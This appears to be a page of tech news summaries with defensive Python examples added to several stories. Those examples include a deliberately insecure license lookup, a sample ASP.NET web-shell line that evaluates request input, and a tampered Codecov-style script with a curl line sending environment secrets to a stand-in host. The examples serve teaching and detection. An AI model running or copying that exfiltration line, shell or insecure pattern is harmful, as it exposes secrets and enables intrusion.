Facebook

Would Be Cool if Everyone Normalized These Pesky Data Leaks, Says Data-Leaking Facebook in Leaked Memo (theregister.com) 33

Facebook wants you to believe that the scraping of 533 million people's personal data from its platform, and the dumping of that data online by nefarious people, is something to be "normalised." The Register: A blundering Facebook public relations operative managed to send a journalist a copy of an internal document detailing the social network's strategy for containing the leaking of 533 million accounts -- and what the memo contained was infuriating though unsurprising. Belgian tech journalist Pieterjan van Leemputten asked the Mark Zuckerberg-owned company some questions about the theft and dumping online of account data earlier this month.

Miscreants had helped themselves to 70GB of names, phone numbers, dates of birth, email addresses, and more from people's Facebook profiles, thanks to a security weakness in the platform. Having stolen the data in 2019, crims bought and sold it among themselves before one shared it via a Tor-hidden site in early April, inviting anyone to come and help themselves to it all. Yet when van Leemputten asked Facebook's mouthpieces to respond, what he got in return was quite unexpected. As he told The Register: "Facebook accidentally sent me an internal email where they literally state that they will frame the recent 533 million data leak as a 'broad industry issue' and that they want to normalize this." The memo added, "To do this, the team is proposing a follow-up post in the next several weeks that talks more broadly about our anti-scraping work and provides more transparency around the amount of work we're doing in this area."

Apple

Tile Bashes Apple's New AirTag as Unfair Competition (techcrunch.com) 87

Now that Apple's lost item finder AirTag has officially been introduced, competitor Tile is going on record ahead of its testimony in front of Congress tomorrow about how it perceives Apple's latest product. In a statement, Tile CEO CJ Prober said today: "Our mission is to solve the everyday pain point of finding lost and misplaced things and we are flattered to see Apple, one of the most valuable companies in the world, enter and validate the category Tile pioneered. The reason so many people turn to Tile to locate their lost or misplaced items is because of the differentiated value we offer our consumers. In addition to providing an industry leading set of features via our app that works with iOS and Android devices, our service is seamlessly integrated with all major voice assistants, including Alexa and Google. And with form factors for every use case and many different styles at affordable prices, there is a Tile for everyone.

Tile has also successfully partnered with top brands like HP, Intel, Skullcandy and Fitbit to enable our finding technology in mass market consumer categories like laptops, earbuds and wearables. With over 30 partners, we look forward to extending the benefits of Tile to millions of customers and enabling an experience that helps you keep track of all your important belongings. We welcome competition, as long as it is fair competition. Unfortunately, given Apple's well-documented history of using its platform advantage to unfairly limit competition for its products, we're skeptical. And given our prior history with Apple, we think it is entirely appropriate for Congress to take a closer look at Apple's business practices specific to its entry into this category. We welcome the opportunity to discuss these issues further in front of Congress tomorrow."

Privacy

Geico Admits Fraudsters Stole Customers' Driver's License Numbers For Months (techcrunch.com) 21

Geico, the second-largest auto insurer in the U.S., has fixed a security bug that let fraudsters steal customers' driver's license numbers from its website. From a report: In a data breach notice filed with the California attorney general's office, Geico said information gathered from other sources was used to "obtain unauthorized access to your driver's license number through the online sales system on our website." The insurance giant did not say how many customers were affected by the breach but said the fraudsters accessed customer driver's license numbers between January 21 and March 1. Companies are required to alert the state's attorney general's office when more than 500 state residents are affected by a security incident. Geico said it had "reason to believe that this information could be used to fraudulently apply for unemployment benefits in your name." Financially motivated criminals frequently target government agencies with stolen identities or data, and many U.S. states require a government ID, such as a driver's license, to file for unemployment benefits. To obtain a driver's license number, fraudsters feed public or previously breached data into auto insurance websites and exploit weaknesses in those sites to retrieve the number the insurer has on file. That number then lets them claim unemployment benefits in the victim's name.
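The pattern the report describes, as an added example in Python that is not from TechCrunch or Geico: a quote endpoint that looks up a stored license number from identity fields anyone can obtain, beside a hardened version that only confirms a number the applicant already supplies, answers identically for unknown customers and wrong numbers, and caps attempts per client. The sample customers, the attempt budget and all function names are constructed for this illustration.

```python
import hmac
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Customer:
    name: str
    dob: str          # YYYY-MM-DD
    zip_code: str
    license_number: str


# Constructed sample records; the names and numbers are made up.
CUSTOMERS = [
    Customer("Jane Q. Public", "1980-04-02", "70001", "T1234567"),
    Customer("John Doe", "1975-11-20", "70002", "V9876543"),
]


def _lookup(name, dob, zip_code):
    key = (name.strip().lower(), dob, zip_code)
    for c in CUSTOMERS:
        if (c.name.lower(), c.dob, c.zip_code) == key:
            return c
    return None


def prefill_license_vulnerable(name, dob, zip_code):
    """The weak pattern: name, date of birth and ZIP are obtainable from public
    records or earlier breaches, yet they unlock a field the insurer already
    holds, and the full number goes back to an unauthenticated caller."""
    c = _lookup(name, dob, zip_code)
    return c.license_number if c else None


MAX_ATTEMPTS = 5          # assumed per-client budget; tune for real traffic
_attempts = Counter()


def verify_license_hardened(name, dob, zip_code, supplied_license, client_id):
    """Hardened form: the applicant must already know the number and the
    server only confirms it, never returns it. An unknown customer and a wrong
    number produce the same answer so the endpoint is not an existence oracle,
    and each client gets a fixed attempt budget so it cannot harvest at scale."""
    _attempts[client_id] += 1
    if _attempts[client_id] > MAX_ATTEMPTS:
        return "rate_limited"
    c = _lookup(name, dob, zip_code)
    stored = c.license_number if c else ""
    # Constant-time compare, run even when no record exists so timing does
    # not separate "no such customer" from "wrong number".
    matched = hmac.compare_digest(stored.encode(), supplied_license.encode())
    return "match" if c and matched else "no_match"
```

The hardened function still leaks one bit per attempt (match or not), which is why the per-client budget matters; in production the budget would be keyed on more than a client identifier the caller controls, and the lookup would sit behind an authenticated session.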
Government

US Unveils Plan To Protect Power Grid From Foreign Hackers (bloomberg.com) 55

The White House unveiled on Tuesday a 100-day plan intended to protect the U.S. power grid from cyber-attacks, mainly by creating a stronger relationship between U.S. national security agencies and the mostly private utilities that run the electrical system. From a report: The plan is among the first big steps toward fulfilling the Biden administration's promise to urgently improve the country's cyber defenses. The nation's power system is both highly vulnerable to hacking and a target for nation-state adversaries looking to counter the U.S. advantage in conventional military and economic power. "The United States faces a well-documented and increasing cyber threat from malicious actors seeking to disrupt the electricity Americans rely on to power our homes and businesses," Secretary of Energy Jennifer Granholm said. Although the plan is billed as a 100-day sprint -- which includes a series of consultations between utilities and the government -- it will likely take years to fully implement, experts say. It will ask utilities to pay for and install technology to better detect hacks of the specialized computers that run the country's power systems, known as industrial control systems. The Edison Electric Institute, the trade group that represents all U.S. investor-owned electric companies, praised the White House plan and the Biden administration's focus on cybersecurity. "Given the sophisticated and constantly changing threats posed by adversaries, America's electric companies remain focused on securing the industrial control systems that operate the North American energy grid," said EEI president Tom Kuhn.
The Internet

WordPress To Automatically Disable Google FLoC On Websites (bleepingcomputer.com) 79

AmiMoJo writes: WordPress announced over the weekend that they plan on treating Google's new FLoC tracking technology as a security concern and hence block it by default on WordPress sites. For some time, browsers have increasingly been blocking the third-party cookies used by advertisers for interest-based advertising. In response, Google introduced a new ad tracking technology called Federated Learning of Cohorts, or FLoC, that uses the web browser to anonymously place users into interest or behavioral buckets based on how they browse the web. After Google began testing FLoC this month in Google Chrome, there has been a consensus among privacy advocates that Google's FLoC implementation just replaces one privacy risk with another one.

"WordPress powers approximately 41% of the web -- and this community can help combat racism, sexism, anti-LGBTQ+ discrimination and discrimination against those with mental illness with four lines of code," says WordPress. WordPress states that this code is planned for WordPress 5.8, scheduled for release in July 2021. As FLoC is expected to roll out sooner, WordPress is considering back-porting this code to earlier versions to "amplify the impact" on current versions of the blogging platform.
Further reading: Nobody is Flying To Join Google's FLoC.
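The opt-out signal behind the "four lines of code" is the response header Permissions-Policy: interest-cohort=(), which tells Chrome not to include a page in cohort calculation. As an added example, not WordPress's own code, the following Python helpers add that directive to a response's headers without clobbering directives already present and check whether a response actually opts out. The header-dictionary shape and the function names are assumptions for this illustration.

```python
FLOC_OPT_OUT = "interest-cohort=()"


def _directives(value):
    """Split a Permissions-Policy value into its 'feature=allowlist' items."""
    return [d.strip() for d in value.split(",") if d.strip()]


def _feature(directive):
    return directive.partition("=")[0].strip().lower()


def add_floc_opt_out(headers):
    """Return a copy of the response headers with interest-cohort=() in
    Permissions-Policy. Existing directives are kept; an existing
    interest-cohort directive with a non-empty allowlist is replaced. Header
    names are matched case-insensitively, as HTTP requires."""
    out = dict(headers)
    key = next((k for k in out if k.lower() == "permissions-policy"), None)
    if key is None:
        out["Permissions-Policy"] = FLOC_OPT_OUT
        return out
    kept = [d for d in _directives(out[key]) if _feature(d) != "interest-cohort"]
    kept.append(FLOC_OPT_OUT)
    out[key] = ", ".join(kept)
    return out


def opts_out_of_floc(headers):
    """True only if the response carries interest-cohort with an empty
    allowlist; interest-cohort=(self) or a missing header does not count."""
    for k, v in headers.items():
        if k.lower() != "permissions-policy":
            continue
        for d in _directives(v):
            name, _, allow = d.partition("=")
            if name.strip().lower() == "interest-cohort" and allow.strip() == "()":
                return True
    return False
```

The checker is the useful half for an operator: a CDN, a caching layer or a plugin that sets its own Permissions-Policy can silently drop the directive, so verify it on the responses clients actually receive rather than trusting the application's configuration.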
Businesses

Mastercard is Acquiring Identity Verification Company Ekata for $850M (techcrunch.com) 5

As online identity management grows in importance, Mastercard swooped in this morning and bought identity verification company Ekata for $850 million. From a report: Mastercard certainly sees the rapid digital transformation that is happening in online commerce, a move that was accelerated by COVID. It's a transformation that, once started, isn't likely to revert to the old ways of doing business, even when we get past the pandemic. With Ekata, the company gets a solution that can verify the online identity of a person making a transaction in real time, using various signals that indicate whether the person is genuine or fraudulent as they open an account or transact business. The company provides a score and other data that predict the likelihood this person is who they say they are. It's not unlike a credit risk score, except for identity. That was one of the primary reasons Mastercard decided to acquire Ekata, according to Ajay Bhalla, president of cyber and intelligence solutions at the company. "With the addition of Ekata, we will advance our identity capabilities and create a safer, seamless way for consumers to prove who they say they are in the new digital economy," Bhalla said in a statement.
Open Source

Openwall Releases 'Linux Kernel Runtime Guard' 0.9.0 (linuxreviews.org) 7

Long-time Slashdot reader xiando shares news from LinuxReviews: Linux Kernel Runtime Guard (LKRG) is a security module for the Linux kernel developed by Openwall. The latest release adds compatibility with Linux kernels up to the soon-to-be-released 5.12, support for building LKRG into kernel images, support for old 32-bit x86 machines and more...

The Linux Kernel Runtime Guard is an out-of-tree kernel module you can load at run time or, with the 0.9.0 release, build into your Linux kernel. It performs runtime integrity checks to detect exploitation of security vulnerabilities in the Linux kernel.

An Openwall developer also notes in the announcement that "During LKRG development and testing I've found 7 Linux kernel bugs, 4 of them have CVE numbers."
United States

A Wave of Tech Workers Transformed Tahoe Into a High-Priced 'Zoom-Town' (outsideonline.com) 161

In 2018 Oracle's Larry Ellison bought the historic Cal Neva Lodge on the scenic north shore of California's Lake Tahoe for $36 million. Then in 2019 Mark Zuckerberg bought a $59 million compound on Lake Tahoe's west shore.

But now a wave of techies are moving in, reports Outside magazine, "freed by COVID from cubicles and work commutes. They migrated, laptops in tow, to mountain towns all over the West, transforming them into modern-day boomtowns: 'Zoom-towns.'" "It's the wildest time," says realtor Katey Brandenburg, who works on Tahoe's Nevada side. For her and other realtors around the lake, the autumn of 2020 felt like winning the lottery. "I paid off a lifetime of debt — 28 years of loans, college, credit cards, and cars — in three months."

All told, 2020 saw more than 2,350 homes sold across the Tahoe Basin, for a boggling $3.28 billion, up from $1.76 billion in 2019, according to data analyzed by Sierra Sotheby's. That $3 billion stat is on a par with 2020 home-sales revenues in Aspen, Colorado (albeit there, the latest average home-sale price came in at $11 million). The trend is in line with real estate records being shattered from Sun Valley, Idaho, to Stowe, Vermont. And according to a just-released market update, it hasn't stopped: in the first quarter of 2021, median prices for single-family homes increased by an astronomical 70 percent year over year in Truckee, 72 percent in South Lake, and 81 percent in Incline Village...

"A disproportionate number of people who purchased homes in Tahoe in 2020 are employees of some of the largest tech companies in the Bay Area," says Deniz Kahramaner, founder of Atlasa, a real estate brokerage firm that specializes in data analytics. Of the 2,280 new-home buyers Atlasa identified throughout the Tahoe region in 2020, roughly 30 percent worked at software companies. The top three employers were Google (54 buyers), Apple (46), and Facebook (34)...

There is, however, one glaring issue with all this rapid, high-priced growth: the people who actually make a mountain town run — the ski instructors and patrollers, lift operators and shuttle drivers, housekeepers and snowcat mechanics, cooks and servers — can no longer afford to live there.

The article does note higher property taxes going toward public services (along with "more money eventually pumping into bars and restaurants.") And it also acknowledges affordable housing has for decades been an issue in tourist towns.

"It's just suddenly on steroids..."
United States

The FBI Accessed and Repaired 'Hundreds' of Hacked Microsoft Exchange Servers (csoonline.com) 86

America's top law enforcement agency "obtained a court order that allowed it to remove a backdoor program from hundreds of private Microsoft Exchange servers that were hacked through zero-day vulnerabilities earlier this year," reports CSO. (Thanks to detritus. (Slashdot reader #46,421) for sharing the news...) Earlier this week, the Department of Justice announced that the FBI was granted a search and seizure warrant by a Texas court that allows the agency to copy and remove web shells from hundreds of on-premises Microsoft Exchange servers owned by private organizations. A web shell is a type of program that hackers install on compromised web servers to grant them backdoor access and remote command execution on those servers through a web-based interface.

In this case, the warrant targeted web shells installed by a cyberespionage group dubbed Hafnium that is believed to have ties to the Chinese government. In early March, Microsoft reported that Hafnium had been exploiting previously unpatched vulnerabilities in Microsoft Exchange to compromise servers. At the same time, the company released patches for those vulnerabilities, as well as indicators of compromise and other detection tools, but this didn't prevent other groups of attackers from exploiting the vulnerabilities after they became public. In its warrant application, dated April 13, the FBI argues that despite the public awareness campaigns by Microsoft, CISA and the FBI itself, many servers remained infected with the web shell deployed by Hafnium. While the exact number has been redacted from the unsealed warrant, the DOJ said in a press release that it was "hundreds."

The FBI asked for, and received, court approval to access the malicious web shells using the passwords set by the original attackers, and then to turn that access against the malware itself by issuing a command that deletes the web shell, which is essentially an .aspx script deployed on the server. The FBI was also allowed to make a copy of each web shell first, because the files could constitute evidence.

The warrant states that it "does not authorize the seizure of any tangible property" or the copying or alteration of any content from the servers aside from the web shells themselves, which are identified in the warrant by their unique file paths. This means the FBI was not granted permission to patch the vulnerabilities to protect the servers from future exploitation, or to remove any additional malware or tools that hackers might have already deployed...

The FBI sent an email message from an official email account, including a copy of the warrant, to the email addresses associated with the domain names of the infected servers.

An official statement from the Department of Justice is already using the past tense, announcing that U.S. authorities "have executed a court-authorized operation to copy and remove malicious web shells from hundreds of vulnerable computers in the United States. They were running on-premises versions of Microsoft Exchange Server software used to provide enterprise-level email service."
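The warrant's scope (specific .aspx files, copied before deletion) maps onto a triage an operator would run on their own server. As an added example in Python, not code from the FBI, CSO or Microsoft, the following scans a set of files for the shape of a minimal ASP.NET web shell (a server-side script block that evaluates request-supplied input), records a hash and a copy of each hit before listing it for removal, and leaves the deletion itself to the operator. The file tree, the contents and the detection heuristics are constructed for this illustration, not a published Hafnium signature.

```python
import hashlib
import re

# Shape of a minimal ASP.NET web shell: a server-side script block that
# evaluates or executes request-supplied input. Assumed heuristics for this
# example, not a published Hafnium signature.
SERVER_SCRIPT = re.compile(r"<script[^>]*runat\s*=\s*[\"']server[\"']", re.I)
EXEC_FROM_REQUEST = re.compile(
    r"\b(eval|Execute|Process\.Start)\s*\(.*?Request\s*[\[.]", re.I | re.S)

# Constructed sample tree (paths and contents made up). The second entry
# stands in for a dropped web shell; the third shows the extension check.
SHELL_PATH = (r"C:\Program Files\Microsoft\Exchange Server\V15"
              r"\FrontEnd\HttpProxy\owa\auth\help_en.aspx")
SAMPLE_FILES = {
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx":
        '<%@ Page Language="C#" %>\n<html><body>Sign in</body></html>\n',
    SHELL_PATH:
        '<script language="JScript" runat="server">'
        'function Page_Load(){eval(Request["cmd"],"unsafe");}</script>',
    r"C:\inetpub\wwwroot\aspnet_client\notes.txt":
        '<script runat="server">eval(Request["cmd"])</script>',
}


def looks_like_web_shell(path, content):
    """Return a reason string if the file is an .aspx page whose server-side
    script hands request input to an evaluator, else None."""
    if not path.lower().endswith(".aspx"):
        return None
    if SERVER_SCRIPT.search(content) and EXEC_FROM_REQUEST.search(content):
        return "server-side script executes request-supplied input"
    return None


def triage(files):
    """files: {path: content}. Preserve a hash and a copy of each flagged file
    before listing it for removal, keeping the copy-then-delete order the
    warrant describes. Returns (evidence, to_remove)."""
    evidence, to_remove = {}, []
    for path, content in files.items():
        reason = looks_like_web_shell(path, content)
        if reason is None:
            continue
        evidence[path] = {
            "sha256": hashlib.sha256(content.encode()).hexdigest(),
            "copy": content,
            "reason": reason,
        }
        to_remove.append(path)
    return evidence, to_remove
```

Removing the shell is not remediation: as the story notes, the servers were still unpatched, and an attacker who reached the box may have left other tooling. Treat a hit as the start of an incident, not the end of one.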
Security

Codecov Bash Uploader Compromised In Supply Chain Hack (securityweek.com) 9

wiredmikey shares a report from SecurityWeek: Security response professionals are scrambling to measure the fallout from a software supply chain compromise of Codecov's Bash Uploader that had gone undetected since January and exposed sensitive secrets like tokens, keys and credentials from organizations around the world. The hack occurred four months ago but was only discovered in the wild by a Codecov customer on the morning of April 1, 2021, the company said. Codecov is considered the vendor of choice for measuring code coverage in the tech industry. The company's tools help developers understand and measure the lines of code executed by a test suite and are widely deployed in big tech development pipelines. The company claims that more than 29,000 enterprises use its code coverage insights to check code quality and maintain code coverage. Codecov did not say how many customers were impacted or had data stolen in the incident.

According to Codecov, the altered version of the Bash Uploader script could potentially affect:
- Any credentials, tokens, or keys that our customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed.
- Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys.
- The git remote information (URL of the origin repository) of repositories using the Bash Uploaders to upload coverage to Codecov in CI.
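A script fetched at build time and piped straight into the shell inherits every secret in the CI environment, which is exactly the exposure the list above describes. As an added example in Python, not Codecov's code or its published remediation, the following shows the two checks a pipeline can run before executing such a script: compare it against a hash pinned in the repository, and flag lines that dump the environment into a network call or talk to a host outside an allowlist. The two sample scripts, the allowlist and the heuristics are constructed for this illustration.

```python
import hashlib
import hmac
import re

# Hosts the upload step is expected to contact; assumed allowlist for this example.
ALLOWED_HOSTS = {"codecov.io"}

NET_TOOL = re.compile(r"\b(curl|wget)\b")
URL_HOST = re.compile(r"https?://([^/\s\"']+)")
ENV_DUMP = re.compile(r"\$\(\s*env\s*\)|\bprintenv\b|\benv\s*\|")

# Constructed sample uploader and a tampered copy with one extra line that
# ships the environment and git remote to a third party.
GOOD_SCRIPT = b"""#!/usr/bin/env bash
set -euo pipefail
token="${CODECOV_TOKEN:-}"
curl -sS -X POST --data-binary @coverage.xml "https://codecov.io/upload/v4?token=${token}"
"""
TAMPERED_SCRIPT = GOOD_SCRIPT + b"""curl -sm 0.5 -d "$(git remote -v) $(env)" http://example.invalid/upload
"""


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def verify_pinned(script, expected_sha256):
    """Compare the fetched script against a hash committed alongside the
    pipeline config; a changed upstream script fails here before it runs."""
    return hmac.compare_digest(sha256_hex(script), expected_sha256.lower())


def suspicious_lines(script_text):
    """Flag network-client lines that dump the environment or contact a host
    outside the allowlist. Returns [(line_number, [reasons])]."""
    findings = []
    for n, line in enumerate(script_text.splitlines(), 1):
        if not NET_TOOL.search(line):
            continue
        reasons = []
        if ENV_DUMP.search(line):
            reasons.append("environment dumped into request")
        for host in URL_HOST.findall(line):
            if host.lower() not in ALLOWED_HOSTS:
                reasons.append("unexpected host " + host)
        if reasons:
            findings.append((n, reasons))
    return findings


def safe_to_run(script, pinned_sha256):
    """Both gates must pass: the hash proves the bytes are the reviewed ones,
    the scan catches a reviewer who pinned a bad version."""
    return verify_pinned(script, pinned_sha256) and not suspicious_lines(script.decode())
```

The hash pin is the control that would have stopped this incident on its own; the line scan is a cheap second opinion for the day the pin is updated. Neither helps once the secrets are already exposed, so the response step is rotating every token the runner could see, not just the one passed to the uploader.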

Google

Google's Project Zero Updates Vulnerability Disclosure Rules To Add Patch Cushion (therecord.media) 9

The Google Project Zero security team has updated its vulnerability disclosure guidelines to add a cushion of 30 days to some security bug disclosures, so end-users have enough time to patch software before attackers can weaponize the bugs. From a report: This week's changes are of particular importance because a large part of the cybersecurity community has adopted Project Zero's rules as the unofficial methodology for disclosing a security bug to software vendors and then to the general public. Prior to today, Google Project Zero researchers would give software vendors 90 days to fix a security bug. When the bug was patched, or at the end of the 90-day window, Google researchers would publish details about the bug online (on their bug tracker). Starting this week, Project Zero says that once a bug is fixed within that window it will wait a further 30 days before publishing any details about it. The reasoning behind the extra time window is to give users of the affected products time to update their software, an operation that can take days or weeks in complex corporate networks.
Technology

Missing California Hiker Found After Mystery Photo Reveals Location (sfgate.com) 97

A mystery photo and a geography enthusiast helped locate a missing California hiker who is now safely back home. From a report: Rene Compean of Palmdale was on a hike Monday near Mount Waterman, a popular ski destination in the San Gabriel Mountains in Southern California. While the 45-year-old was on his outdoor adventure, he snapped a picture. Compean texted the shot to a friend. And then, he went off the map. He was reported missing at 6 p.m. by a friend, who received one last text from Compean saying he was worried he was lost and his cell phone battery was running low. The photo was turned over to investigators at the Los Angeles County Sheriff's Department who posted it to social media, asking if anyone recognized the spot in the photograph. Benjamin Kuo saw the message and thought he might be able to help. The report adds: As a satellite image aficionado, he was already familiar with tracking California wildfires in remote areas. "I've got a very weird hobby, which is I love taking a look at photos and figuring out where they're taken," Kuo told NBC Los Angeles. Using satellite images, maps and the scenery below Compean's feet in the photo, Kuo was able to estimate the coordinates of where he believed the man had gone missing. Kuo sent his tip to the sheriff's office, and a helicopter was sent to survey the area Tuesday. There, as if by magic, was Compean.
Google

Nobody is Flying To Join Google's FLoC (theverge.com) 65

Google is all alone with its proposed advertising technology -- FLoC-- to replace third-party cookies. Every major browser that uses the open source Chromium project has declined to use it, and it's unclear what that will mean for the future of advertising on the web. Firefox, Safari, Microsoft Edge, Vivaldi, and Brave have said they are not implementing Google's FLoC into their browsers.
Security

Google Backs New Security Standard for Smartphone VPN Apps (zdnet.com) 16

The Internet of Secure Things Alliance, an IoT security certification body (a.k.a. ioXt), has launched a new security certification for mobile apps and VPNs. From a report: The new ioXt compliance program includes a 'mobile application profile' -- a set of security-related criteria against which apps can be certified. The profile or mobile app assessment includes additional requirements for virtual private network (VPN) applications. Google and Amazon had a hand in shaping the criteria, along with a number of certified labs such as NCC Group and Dekra, and mobile app security testing vendors such as NowSecure. Google's VPN within the Google One service is one of the first to be certified against the criteria. Mobile app makers can get their apps certified against a set of security and privacy requirements. The ioXt Alliance has a broad cross-section of members from the tech industry, with its board comprising execs from Amazon, Comcast, Facebook, Google, Legrand, Resideo, Schneider Electric, T-Mobile, the Zigbee Alliance, and the Z-Wave Alliance. About 20 industry figures helped write the requirements for the mobile app profile, including Amit Agrawal, a principal security architect at Amazon, and Brooke Davis from the Strategic Partnerships team at Google Play. Both are vice-chairs of the mobile app profile group.
The Almighty Buck

Schwab Sues Former Client After Accidental Transfer of $1.2 Million (reuters.com) 198

An anonymous reader writes: Charles Schwab is suing one of its former customers after the retail brokerage allegedly sent more than $1.2 million to an account of the Louisiana woman and then could not get the money back. Schwab meant to send $82.56 to Kelyn Spadoni's Fidelity Brokerage Services account in February, but a computer glitch caused it to erroneously transfer more than $1.2 million, according to the lawsuit. Schwab tried to get the money back, but repeated calls and texts to Spadoni, who lives in a suburb of New Orleans, were not returned, the brokerage said in the lawsuit. "We are fully cooperating with authorities in an effort to resolve this issue," Schwab said in a statement on Tuesday. Fidelity declined comment. After receiving the money in her account, Spadoni transferred a quarter of the money to another account, after which she bought a house and a car using the funds, Jefferson Parish Sheriff's Office spokesman Captain Jason Rivarde said in an interview on Tuesday. "Obviously you are not planning to give the money back if you spent it," he said. When Spadoni signed up with Schwab in January, the agreement she signed included a section that said any overpayment of funds must be returned, said the lawsuit, filed March 30.
Earth

Google Earth Now Shows Decades of Climate Change in Seconds (bloomberg.com) 66

Google Earth has partnered with NASA, the U.S. Geological Survey, the EU's Copernicus Climate Change Service, and Carnegie Mellon University's CREATE Lab to bring users time-lapse images of the planet's surface -- 24 million satellite photos taken over 37 years. Together they offer photographic evidence of a planet changing faster than at any time in millennia. Shorelines creep in. Cities blossom. Trees fall. Water reservoirs shrink. Glaciers melt and fracture. From a report: "We can objectively see global warming with our own eyes," said Rebecca Moore, director of Google Earth. "We hope that this can ground everyone in an objective, common understanding of what's actually happening on the planet, and inspire action." Timelapse, the name of the new Google Earth feature, is the largest video on the planet, according to a statement from the company, requiring 2 million hours to process in cloud computers, and the equivalent of 530,000 high-resolution videos. The tool stitches together nearly 50 years of imagery from the U.S.'s Landsat program, which is run by NASA and the USGS. When combined with images from complementary European Sentinel-2 satellites, Landsat provides the equivalent of complete coverage of the Earth's surface every two days. Google Earth is expected to update Timelapse about once a year.
Businesses

Dell Announces Long-Awaited Spinoff of VMware (siliconangle.com) 27

Dell has announced the long-expected spinoff of VMware, the computing virtualization company it has majority-owned since it bought then-owner EMC Corp. in 2016. From a report: The computing giant said it will spin off its 81% equity ownership in VMware, creating two standalone companies when the move is completed in the fourth quarter of this year. That timing depends on conditions such as a favorable Internal Revenue Service opinion that the transaction qualifies for tax-free status for Dell shareholders. The idea is to simplify the companies' capital structures, since arguably investors have valued both companies' stocks lower than they might have because of the uncertainties related to the complex capital structures. Dell's shares rose about 9% in after-hours trading, while VMware's shares rose about 1.6% in late trading. Under the spinoff, which Dell had signaled last year, VMware will distribute a cash dividend of about $11.5 billion to $12 billion to shareholders, which of course include publicly held Dell itself. Chairman and Chief Executive Michael Dell, along with financial partner Silver Lake Partners, own 60% of Dell shares. Dell will get $9.3 billion to $9.7 billion of that dividend, which the company said will help it get more investment-grade ratings and enable it to pay down debt it has gradually been reducing since buying EMC.
Google

Google's FeedBurner Moves To a New Infrastructure But Loses Its Email Subscription Service (techcrunch.com) 6

Google today announced that it is moving FeedBurner to a new infrastructure but also deprecating its email subscription service. From a report: If you're an internet user of a certain age, chances are you used Google's FeedBurner to manage the RSS feeds of your personal blogs and early podcasts at some point. During the Web 2.0 era, it was the de facto standard for feed management and analytics, after all. Founded in 2004, with Dick Costolo as one of its co-founders (before he became Twitter's CEO in 2010), it was acquired by Google in 2007. Ever since, FeedBurner lingered in an odd kind of limbo. While Google had no qualms shutting down popular services like Google Reader in favor of its ill-fated social experiments like Google+, FeedBurner just kept burning feeds day in and day out, even as Google slowly deprecated some parts of the service, most notably its advertising integrations. [...] But in July, it is also shutting down some non-core features that don't directly involve feed management, most importantly the FeedBurner email subscription service that allowed you to get emailed alerts when a feed updates. Feed owners will be able to download their email subscriber lists (and will be able to do so after July, too).
Desktops (Apple)

Parallels 16.5 Can Virtualize ARM Windows Natively on M1 Macs With Up to 30% Faster Performance (macrumors.com) 60

Parallels today announced the release of Parallels Desktop 16.5 for Mac with full support for M1 Macs, allowing for the Windows 10 ARM Insider Preview and ARM-based Linux distributions to be run in a virtual machine at native speeds on M1 Macs. From a report: Parallels says running a Windows 10 ARM Insider Preview virtual machine natively on an M1 Mac results in up to 30 percent better performance compared to a 2019 model 15-inch MacBook Pro with an Intel Core i9 processor, 32GB of RAM, and Radeon Pro Vega 20 graphics. Parallels also indicates that on an M1 Mac, Parallels Desktop 16.5 uses 2.5x less energy than on the latest Intel-based MacBook Air. Microsoft does not yet offer a retail version of ARM-based Windows, with the Windows 10 ARM Insider Preview available on Microsoft's website for Windows Insider program members. The ability to run macOS Big Sur in a virtual machine is a feature that Parallels hopes to add support for in Parallels Desktop later this year as well.
Security

Sweden Drops Russian Hacking Investigation Due To Legal Complications (therecord.media) 12

The Swedish government today dropped its investigation into the 2017 hack of its sports authority, citing legal constraints that would have prevented prosecutors from charging the Russian hackers responsible for the intrusion, who officials said were mere pawns operating on behalf of a "foreign power." From a report: This marks the first time that such a legal clause has been cited by prosecutors investigating cyber-espionage hacking groups. Today's statement from the Swedish Prosecution Authority also marks the first time that Swedish officials have formally blamed the Russian government for the 2017 hack of the Swedish Sports Confederation (SSC). Citing a recently concluded investigation by the Swedish Security Service, which also involved foreign intelligence services, Swedish prosecutors said that one of Russia's military hacker groups breached the sports body between December 2017 and May 2018 and stole medical records of Swedish athletes.
